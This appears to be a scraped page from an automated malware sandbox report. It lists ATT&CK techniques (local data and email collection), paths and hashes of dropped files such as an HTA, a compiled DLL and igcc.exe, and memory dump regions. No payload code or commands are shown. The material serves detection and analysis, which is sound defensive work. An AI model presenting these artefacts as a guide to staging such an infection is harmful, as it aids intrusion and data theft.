Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WNZH54VQ\IEnetCache[1].hta

Filesize
12KB

MD5
c849d88a3cce69be07288d909e56b68f

SHA1
49c9032a05ca1cb3393ba131d3c23d23e8c04544

SHA256
1b3bae8cdc663d747a703aecff3e14f55a4928f4197060bdc1ee57037dd118fd

SHA512
3090bed8eaf2aa3b4c93d20430f4820ddc9f18f900f6311cecd35d38ad6465d57dc5b4114c9ad6f7e225ecff42b8331e6dff70d57aa158c0767737f8810aec2b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESDD65.tmp

Filesize
1KB

MD5
1400189446584c917d1b373d3ef6f918

SHA1
6aec8cd139a2d7280ab59e8445f3565999ba4779

SHA256
5cae546ec88e5aeece9a1f251b793e3c72c2180f3a62d3d82b8c6a499108126f

SHA512
d8cead098bd0241c7e03b15d2c111454212204417370471cde14aabfb61361de6bfb50bd8b1755e631f9908fbc83fcc3c3198d84664aeaed182c13c168d07bf4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Vnrfyfw.tmpdb

Filesize
92KB

MD5
cf00cf5b059b43e29cbde1a36c6209f3

SHA1
9df2f8ef60997e3934fef0d88f9770fb9d19769f

SHA256
9f861e6046979ac19a569747cd17b7e77a8e1301c870691595a68d9a8244a30a

SHA512
16e433a67de26cbf052f2639df05c5d3d2c5ef5d4ef065b45af913174e08415bd6672f6637e8727e88b2e68c74c2ffeabc6673e1506e8ad397edb198e0276399

Download Submit
C:\Users\Admin\AppData\Local\Temp\Zfcisclff.tmpdb

Filesize
148KB

MD5
90a1d4b55edf36fa8b4cc6974ed7d4c4

SHA1
aba1b8d0e05421e7df5982899f626211c3c4b5c1

SHA256
7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c

SHA512
ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2

Download Submit
C:\Users\Admin\AppData\Local\Temp\yyk-c2li.dll

Filesize
3KB

MD5
8424c46596c5d373a44a97a3e911f7fc

SHA1
9a9c7dca8cf9b177eef0e961100ef82474663e0e

SHA256
a6f815e809cdc4983b869c95fc716299b6549e4bce3408c9d4d42d0289cc081b

SHA512
4628c8a5d939e704f5afda8ec845f21a252c08928f72ab66081efc5520688119f675a7de40e248075739d08170b85bcf6bff35e7e0234598f205230aba7ba541

Download Submit
C:\Users\Admin\AppData\Local\Temp\yyk-c2li.pdb

Filesize
7KB

MD5
8b29e9a7631bc2da59daacd8f613824e

SHA1
84319c827fac4d9c47fcefe088766cfe43a8475b

SHA256
87e835ba1ec9e60f0b32b6aaf8cb22997310cd3177b86cc941d729a5c0567848

SHA512
df9f19475970c9102913266ef6eb02937c55f3b5c641f1b3fd17bd105896dab7e741f9d9a08808f7a5079c55cdd8cc28f8afa9af255f056dd4c078fd2ea0ef46

Download Submit
C:\Users\Admin\AppData\Roaming\igcc.exe

Filesize
2.3MB

MD5
8f54b4313fd8bb6699b204e17bffcc9f

SHA1
f5e98d57ca2bf5ecffd88e1875581a9757b90d21

SHA256
519ba6c21cf3d1096b92d6a5c184631666e8fab40d95b6d51fe56bc4011f180e

SHA512
8a63cd9a90d6d9ebaba1697910055dbf1972800e459813684cd69e46a134aea5dc4d5635fad045a3a9418872db2567f7f26f733967cbc2f0309d79edfc8b861a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCDD64.tmp

Filesize
652B

MD5
2bffc14eaf7d575f035abcb50d6cea72

SHA1
4dd7cc25c9964343c73cfe6533b789ead4b71cb1

SHA256
6b461c3482cecd7835b82711488caf132570dd3a0a40529a54d8d64fcb46ee91

SHA512
37fb50415eb7ec1db644c522c11aca7193b9b6da8476145bae08ade5834ce1cf2a63ce0ed4a37b0a41d9ca0143e7b345912bfbb6da60d0088f3d081fcdac2804

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yyk-c2li.0.cs

Filesize
456B

MD5
195c6b0f7137412b745596992c754459

SHA1
bf216fec37e6d127f0748b5dd00b167a7990718a

SHA256
2ec67a5883659ab94167dc7f4f88c6390a944f723a52935e1a4118aff3ceddee

SHA512
5270f2da644575d664bfb2f8263fdd2b380c178bdf66460828b4b38766f5c0741d181d33dbf29a68ea536721b73b7876b37ce293149c92958fc2568faf2b30f5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\yyk-c2li.cmdline

Filesize
309B

MD5
1757d0189ea42564918bddca9d01260d

SHA1
480cb0b414f0626cd242120cec68b47328fed377

SHA256
f00f4cec5ac6d35ce7475e55a70cb8e0d22e4205c9499ea68b5df1228d1ff0dc

SHA512
a8f3dee455b954637053fc002f05557ab83e0bef0fc993c52d27e5f631c948c40aafe1e02b75c53db267dc4b51df0898f77e285ab891b5f6b1b84f9437d0b354

Download Submit
memory/1844-73-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-83-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-39-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-43-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-45-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-47-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-49-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-51-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-53-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-55-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-57-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-59-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-61-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-63-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-65-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-67-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-69-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-71-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-38-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-75-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-77-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-79-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-81-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-41-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-85-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-87-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-89-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-91-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-93-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-95-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-97-0x000000001C270000-0x000000001C552000-memory.dmp

Filesize
2.9MB

Download
memory/1844-4900-0x000000001BB00000-0x000000001BC26000-memory.dmp

Filesize
1.1MB

Download
memory/1844-4901-0x0000000000570000-0x00000000005BC000-memory.dmp

Filesize
304KB

Download
memory/1844-4902-0x0000000000870000-0x00000000008C4000-memory.dmp

Filesize
336KB

Download
memory/1844-36-0x00000000008D0000-0x0000000000B2E000-memory.dmp

Filesize
2.4MB

Download
memory/1844-37-0x000000001C270000-0x000000001C558000-memory.dmp

Filesize
2.9MB

Download
memory/2104-4-0x00000000023B0000-0x00000000023B2000-memory.dmp

Filesize
8KB

Download
memory/2104-7792-0x000000007252D000-0x0000000072538000-memory.dmp

Filesize
44KB

Download
memory/2104-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2104-1-0x000000007252D000-0x0000000072538000-memory.dmp

Filesize
44KB

Download
memory/2104-7834-0x000000007252D000-0x0000000072538000-memory.dmp

Filesize
44KB

Download
memory/2156-3-0x0000000002560000-0x0000000002562000-memory.dmp

Filesize
8KB

Download
memory/3484-4932-0x00000000027C0000-0x00000000028D0000-memory.dmp

Filesize
1.1MB

Download
memory/3484-7791-0x00000000024E0000-0x000000000257E000-memory.dmp

Filesize
632KB

Download
memory/3484-7793-0x000000001B100000-0x000000001B14C000-memory.dmp

Filesize
304KB

Download
memory/3484-7794-0x0000000000830000-0x000000000083A000-memory.dmp

Filesize
40KB

Download
memory/3484-7795-0x000000001C790000-0x000000001C80A000-memory.dmp

Filesize
488KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.